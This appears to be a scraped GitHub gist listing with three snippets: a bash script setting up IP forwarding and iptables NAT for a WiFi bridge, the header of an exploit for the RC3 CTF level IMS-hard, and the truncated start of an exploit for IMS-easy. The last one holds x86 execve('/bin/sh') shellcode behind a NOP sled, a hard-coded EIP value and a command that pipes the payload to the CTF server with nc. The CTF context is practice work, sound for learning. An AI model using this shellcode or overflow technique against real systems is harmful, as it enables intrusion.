Skip to content

Instantly share code, notes, and snippets.

@Xeratec
Xeratec / wifiNetBridge.sh
Created February 13, 2019 13:17
Bash script to create a NAT Bridge (e.g. for headless RPI3)
#!/bin/bash
echo "----[ Astro Bridge-Wifi Setup ]-----"
echo "Enabling IPV4 Forwarding"
sudo sysctl -w net.ipv4.ip_forward=1
echo "Setup Bridge"
sudo iptables -A FORWARD --in-interface enp62s0u1 -j ACCEPT
sudo iptables -t nat -A POSTROUTING --out-interface wlp4s0 -j MASQUERADE
@Xeratec
Xeratec / xeratec_ctf_rc3_IMS-hard_400_revised.py
Last active November 24, 2016 08:17
Code for RC3 CTF level IMS-hard
#!/usr/bin/python
"""
# This is my exploit code for RC3 CTF Level: IMS-hard
# It was made after the completion of this event, but luckily the servers are
# still online [26.11.16], so the code was tested on a "living" target.
# I know, my code is a bit overpowered but I had my fun while programming :)
#
# Additional Info:
# After I got the overwriting process of the canary value working, I created
# a copy of the IMS-hard binary and patched the canary value check in the main
@Xeratec
Xeratec / xeratec_ctf_rc3_IMS-easy_150_raw.py
Last active November 23, 2016 21:22
Code for RC3 CTF level IMS-easy
#!/usr/bin/python
# Run with #> (python gen_stdin.py; cat) | nc ims.ctf.rc3.club 7777
import sys
import struct
shellcode = [0x90909090,0x90909090,0x90909090,0x90909090,0x90909090,0x90909090,0x90909090,0x90909090,0x90909090,0x90909090,0x90909090,0x90909090,0x31c05068,0x2f2f7368,0x682f6269,0x6e89e350,0x89e25389,0xe1b00bcd,0x80909090,0xaaaaaaaa]
eip = 0x080d1fa0
for i in range(0,18,3):
print "1" # Create new Item